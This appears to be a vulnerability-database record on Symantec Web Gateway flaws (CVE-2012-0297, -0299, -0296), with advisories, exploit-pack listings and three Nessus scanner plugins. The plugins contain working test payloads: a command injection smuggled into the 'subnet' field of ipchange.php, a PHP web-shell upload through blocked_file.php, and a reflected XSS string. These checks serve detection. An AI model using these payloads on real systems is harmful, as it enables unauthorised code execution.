"2020-02-13T00:00:00", "id": "AKB:B3B3DA42-859E-48BF-B67E-3A4E5F266E97", "href": "https://attackerkb.com/topics/cMKWCp2RlE/cve-2012-0297-symantec-web-gateway-vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:53", "description": "Added: 06/11/2012 \nCVE: [CVE-2012-0297](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0297>) \nBID: [53444](<http://www.securityfocus.com/bid/53444>) \nOSVDB: [82023](<http://www.osvdb.org/82023>) \n\n\n### Background\n\nSymantec Web Gateway protects organizations against multiple types of Web-based malware and prevents data loss over the Web. \n\n### Problem\n\nSymantec Web Gateway fails to properly sanitize user-supplied input passed to \"/spywall/releasenotes.php\" via the \"relfile\" parameter. This can be exploited to execute arbitrary PHP code. 
\n\n### Resolution\n\nUpgrade Symantec Web Gateway to version 5.0.3 or higher. \n\n### References\n\n<http://secunia.com/advisories/49216> \n[http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00 ](<http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00\n>) \n\n\n### Limitations\n\nThis exploit has been tested against Symantec Web Gateway 5.0.0.216 and 5.0.2.8 \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "saint", "title": "Symantec Web Gateway access_log PHP Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-11T00:00:00", "id": "SAINT:0D475EE538584A09C093C3CE051B9477", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/symantec_web_gateway_access_log_rce", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-12-03T16:52:20", "description": "Added: 06/11/2012 \nCVE: [CVE-2012-0297](<https://vulners.com/cve/CVE-2012-0297>) \nBID: [53444](<http://www.securityfocus.com/bid/53444>) \nOSVDB: [82023](<http://www.osvdb.org/82023>) \n\n\n### Background\n\nSymantec Web Gateway protects organizations against multiple types of Web-based malware and prevents data loss over the Web. \n\n### Problem\n\nSymantec Web Gateway fails to properly sanitize user-supplied input passed to \"/spywall/releasenotes.php\" via the \"relfile\" parameter. This can be exploited to execute arbitrary PHP code. \n\n### Resolution\n\nUpgrade Symantec Web Gateway to version 5.0.3 or higher. 
\n\n### References\n\n<http://secunia.com/advisories/49216> \n[http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00 ](<http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00\n>) \n\n\n### Limitations\n\nThis exploit has been tested against Symantec Web Gateway 5.0.0.216 and 5.0.2.8 \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "saint", "title": "Symantec Web Gateway access_log PHP Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-11T00:00:00", "id": "SAINT:79AF1DDEAA9DAE2B17DA10C8A568E698", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/symantec_web_gateway_access_log_rce", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:28", "description": "Added: 06/11/2012 \nCVE: [CVE-2012-0297](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0297>) \nBID: [53444](<http://www.securityfocus.com/bid/53444>) \nOSVDB: [82023](<http://www.osvdb.org/82023>) \n\n\n### Background\n\nSymantec Web Gateway protects organizations against multiple types of Web-based malware and prevents data loss over the Web. \n\n### Problem\n\nSymantec Web Gateway fails to properly sanitize user-supplied input passed to \"/spywall/releasenotes.php\" via the \"relfile\" parameter. 
This can be exploited to execute arbitrary PHP code. \n\n### Resolution\n\nUpgrade Symantec Web Gateway to version 5.0.3 or higher. \n\n### References\n\n<http://secunia.com/advisories/49216> \n[http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00](<http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00>) \n\n\n### Limitations\n\nThis exploit has been tested against Symantec Web Gateway 5.0.0.216 and 5.0.2.8 \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "saint", "title": "Symantec Web Gateway access_log PHP Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-11T00:00:00", "id": "SAINT:CA79171627977B6EB496110895555ECA", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/symantec_web_gateway_access_log_rce", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-20T18:52:50", "description": "Added: 06/11/2012 \nCVE: [CVE-2012-0297](<https://vulners.com/cve/CVE-2012-0297>) \nBID: [53444](<http://www.securityfocus.com/bid/53444>) \nOSVDB: [82023](<http://www.osvdb.org/82023>) \n\n\n### Background\n\nSymantec Web Gateway protects organizations against multiple types of Web-based malware and prevents data loss over the Web. 
\n\n### Problem\n\nSymantec Web Gateway fails to properly sanitize user-supplied input passed to \"/spywall/releasenotes.php\" via the \"relfile\" parameter. This can be exploited to execute arbitrary PHP code. \n\n### Resolution\n\nUpgrade Symantec Web Gateway to version 5.0.3 or higher. \n\n### References\n\n<http://secunia.com/advisories/49216> \n[http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00](<http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00>) \n\n\n### Limitations\n\nThis exploit has been tested against Symantec Web Gateway 5.0.0.216 and 5.0.2.8 \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "saint", "title": "Symantec Web Gateway access_log PHP Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-11T00:00:00", "id": "SAINT:09723FE34C900B59CB593CFB790946C5", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/symantec_web_gateway_access_log_rce", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "Local file include vulnerability in Symantec Web Gateway releasenotes.php\n\nVulnerability Type: Local File Include", "cvss3": {}, "published": "2012-06-09T00:00:00", "type": "dsquare", "title": "Symantec Web Gateway 5.0.2 LFI", 
"bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2013-04-02T00:00:00", "id": "E-163", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in Symantec Web Gateway blocked_file.php\n\nVulnerability Type: File Upload", "cvss3": {}, "published": "2012-06-09T00:00:00", "type": "dsquare", "title": "Symantec Web Gateway 5.0.2 File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0299"], "modified": "2013-04-02T00:00:00", "id": "E-82", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:45", "description": "Remote command execution vulnerability in Symantec Web Gateway network.php\n\nVulnerability Type: Remote Command Execution", "cvss3": {}, "published": 
"2012-06-09T00:00:00", "type": "dsquare", "title": "Symantec Web Gateway 5.0.2 RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2013-04-02T00:00:00", "id": "E-158", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-12-03T16:02:33", "description": "The remote web server is hosting a version of Symantec Web Gateway that is affected by a shell command injection vulnerability. The ipchange.php script calls the exec() function with user-controlled input that is not properly sanitized. A remote, unauthenticated attacker could exploit this to execute arbitrary shell commands as the apache user. 
After exploitation, obtaining a root shell is trivial.", "cvss3": {}, "published": "2012-05-21T00:00:00", "type": "nessus", "title": "Symantec Web Gateway ipchange.php Shell Command Injection (SYM12-006) (intrusive check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0297"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:symantec:web_gateway"], "id": "SYMANTEC_WEB_GATEWAY_IPCHANGE_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/59208", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59208);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-0297\");\n script_bugtraq_id(53444);\n script_xref(name:\"TRA\", value:\"TRA-2012-03\");\n script_xref(name:\"EDB-ID\", value:\"19065\");\n\n script_name(english:\"Symantec Web Gateway ipchange.php Shell Command Injection (SYM12-006) (intrusive check)\");\n script_summary(english:\"Uploads and executes a PHP script\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web security application hosted on the remote web server has a\ncommand injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is hosting a version of Symantec Web Gateway\nthat is affected by a shell command injection vulnerability. The\nipchange.php script calls the exec() function with user-controlled\ninput that is not properly sanitized. A remote, unauthenticated\nattacker could exploit this to execute arbitrary shell commands as\nthe apache user. 
After exploitation, obtaining a root shell is\ntrivial.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2012-03\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-090/\");\n # https://support.symantec.com/en_US/article.SYMSA1250.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5b5929ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Symantec Web Gateway version 5.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Symantec Web Gateway 5.0.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/21\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:web_gateway\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"symantec_web_gateway_detect.nasl\");\n script_require_keys(\"www/symantec_web_gateway\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:443, php:TRUE);\ninstall = get_install_from_kb(appname:'symantec_web_gateway', port:port, exit_on_fail:TRUE);\n\nurl = install['dir'] + '/ipchange.php';\nfilename = strcat('cleaner/', SCRIPT_NAME, '-', unixtime(), '.php');\ncmd = 'echo \"<? 
system(\"id\"); ?>\" > ' + filename;\npostdata = 'ip=localhost%0d%0a&subnet=\"|' + cmd + '|\"';\nres = http_send_recv3(\n method:'POST',\n port:port,\n item:url,\n content_type:'application/x-www-form-urlencoded',\n data:postdata,\n exit_on_fail:TRUE\n);\nscript_creation = http_last_sent_request();\n\nurl = install['dir'] + '/' + filename;\nres = http_send_recv3(method:'GET', item:url, port:port, exit_on_fail:TRUE);\n\nif(!egrep(pattern:'uid=[0-9]+.*gid=[0-9]+.*', string:res[2]))\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'Symantec Web Gateway', build_url(qs:install['dir'], port:port));\n\nif (report_verbosity > 0)\n{\n report =\n '\\nNessus created a PHP file by sending the following request :\\n\\n' +\n crap(data:\"-\", length:30)+' Request '+ crap(data:\"-\", length:30)+'\\n'+\n chomp(script_creation) + '\\n' +\n crap(data:\"-\", length:30)+' Request '+ crap(data:\"-\", length:30)+'\\n'+\n '\\nThis file executes the \"id\" command and is located at :\\n\\n' +\n build_url(qs:url, port:port) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nRequesting this file returned the following output :\\n\\n' + \n data_protection::sanitize_uid(output:chomp(res[2])) + '\\n';\n\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-03T16:02:34", "description": "The remote web server is hosting a version of Symantec Web Gateway with a code execution vulnerability. The upload_file() function of util_functions.php allows PHP files to be uploaded to a directory where the web server can execute them. This function is used by multiple PHP scripts that can be requested without authentication. 
A remote, unauthenticated attacker could exploit this to execute arbitrary code.\nAchieving root command execution is trivial.", "cvss3": {}, "published": "2012-05-21T00:00:00", "type": "nessus", "title": "Symantec Web Gateway upload_file() Remote Code Execution (SYM12-006) (intrusive check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0299"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:symantec:web_gateway"], "id": "SYMANTEC_WEB_GATEWAY_UPLOAD_FILE_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/59210", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\n\nif (description)\n{\n script_id(59210);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-0299\");\n script_bugtraq_id(53443);\n script_xref(name:\"TRA\", value:\"TRA-2012-03\");\n\n script_name(english:\"Symantec Web Gateway upload_file() Remote Code Execution (SYM12-006) (intrusive check)\");\n script_summary(english:\"Tries to upload & request a PHP file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web security application hosted on the remote web server has a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is hosting a version of Symantec Web Gateway\nwith a code execution vulnerability. The upload_file() function of\nutil_functions.php allows PHP files to be uploaded to a directory where\nthe web server can execute them. This function is used by multiple PHP\nscripts that can be requested without authentication. 
A remote,\nunauthenticated attacker could exploit this to execute arbitrary code.\nAchieving root command execution is trivial.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2012-03\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-091/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523065/30/0/threaded\");\n # https://support.symantec.com/en_US/article.SYMSA1250.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5b5929ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Symantec Web Gateway 5.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Symantec Web Gateway 5.0.2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:web_gateway\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"symantec_web_gateway_detect.nasl\");\n script_require_keys(\"www/symantec_web_gateway\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:443, php:TRUE);\ninstall = get_install_from_kb(appname:'symantec_web_gateway', port:port, exit_on_fail:TRUE);\n\nboundary = '----nessus';\nurl = install['dir'] + '/blocked_file.php';\nnow = unixtime();\nphp = '<?php print_r(\"' + now + '\\\\n\"); system(\"id\"); ?>';\npostdata = '--' + boundary + '\\r\nContent-Disposition: form-data; name=\"submitted\"\\r\n\\r\n1\\r\n--' + boundary + '\\r\nContent-Disposition: form-data; name=\"new_image\"; filename=\"payload.php\"\\r\nContent-Type: text/plain\\r\n\\r\n' + php + '\\r\n\\r\n--' + boundary + '--\\r\\n';\nres = http_send_recv3(\n method:'POST',\n port:port,\n item:url,\n content_type:'multipart/form-data; boundary=' + boundary,\n data:postdata,\n exit_on_fail:TRUE\n);\nscript_creation = http_last_sent_request();\n\nurl = install['dir'] + '/images/upload/temp/temp.php';\nres = http_send_recv3(method:'GET', item:url, port:port, exit_on_fail:TRUE);\n\nif(now >!< res[2] || !egrep(pattern:'uid=[0-9]+.*gid=[0-9]+.*', string:res[2]))\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'Symantec Web Gateway', build_url(qs:install['dir'], port:port));\n\nif (report_verbosity > 0)\n{\n report =\n '\\nNessus uploaded a PHP file by sending the following request :\\n\\n' +\n crap(data:\"-\", length:30)+' Request '+ crap(data:\"-\", 
length:30)+'\\n'+\n chomp(script_creation) + '\\n' +\n crap(data:\"-\", length:30)+' Request '+ crap(data:\"-\", length:30)+'\\n'+\n '\\nThis file executes the \"id\" command and is located at :\\n\\n' +\n build_url(qs:url, port:port) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nRequesting this file returned the following output :\\n\\n' + \n data_protection::sanitize_uid(output:chomp(res[2])) + '\\n';\n\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-03T16:02:48", "description": "The remote web server is hosting a version of Symantec Web Gateway that is vulnerable to cross-site scripting attacks. Input to the 'l' parameter of timer.php is not properly sanitized. An attacker could exploit this by tricking a user into making a malicious request, resulting in arbitrary script code execution. There are reportedly other cross-site scripting vulnerabilities in this version of the software, though Nessus has not checked for those issues.", "cvss3": {}, "published": "2012-05-15T00:00:00", "type": "nessus", "title": "Symantec Web Gateway timer.php XSS (SYM12-006)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0296"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:symantec:web_gateway"], "id": "SYMANTEC_WEB_GATEWAY_TIMER_XSS.NASL", "href": "https://www.tenable.com/plugins/nessus/59097", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59097);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-0296\");\n script_bugtraq_id(53396);\n script_xref(name:\"EDB-ID\", value:\"18832\");\n\n script_name(english:\"Symantec Web Gateway timer.php XSS (SYM12-006)\");\n script_summary(english:\"Attempts reflected XSS\");\n\n 
script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A web security application hosted on the remote web server has a\ncross-site scripting vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote web server is hosting a version of Symantec Web Gateway\nthat is vulnerable to cross-site scripting attacks. Input to the 'l'\nparameter of timer.php is not properly sanitized. An attacker could\nexploit this by tricking a user into making a malicious request,\nresulting in arbitrary script code execution. There are reportedly\nother cross-site scripting vulnerabilities in this version of the\nsoftware, though Nessus has not checked for those issues.\"\n );\n # https://support.symantec.com/en_US/article.SYMSA1250.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5b5929ae\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Symantec Web Gateway 5.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/04\"); \n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:web_gateway\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, 
Inc.\");\n\n script_dependencies(\"symantec_web_gateway_detect.nasl\");\n script_require_keys(\"www/symantec_web_gateway\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:443, php:TRUE);\ninstall = get_install_from_kb(appname:'symantec_web_gateway', port:port, exit_on_fail:TRUE);\n\ndir = install['dir'];\ncgi = '/timer.php';\nxss = '<script>alert(/' + SCRIPT_NAME + '/)</script>';\nqs = 'l=' + xss;\nexpected_output = '0 of ' + xss + ' bytes scanned';\n\nvulnerable = test_cgi_xss(\n port:port,\n dirs:make_list(dir),\n cgi:cgi,\n qs:qs,\n pass_str:expected_output,\n ctrl_re:'<h3>Symantec Web Gateway</h3>'\n);\n\nif (!vulnerable)\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'Symantec Web Gateway', build_url(qs:dir, port:port));\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "d2": [{"lastseen": "2021-07-28T14:32:17", "description": "**Name**| d2sec_symwebgw \n---|--- \n**CVE**| CVE-2012-0297 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| Symantec Web Gateway 5.0.2 Local File Include Vulnerability \n**Notes**| \n", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "d2", "title": "DSquare Exploit Pack: D2SEC_SYMWEBGW", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2012-05-21T20:55:00", "id": "D2SEC_SYMWEBGW", 
"href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_symwebgw", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}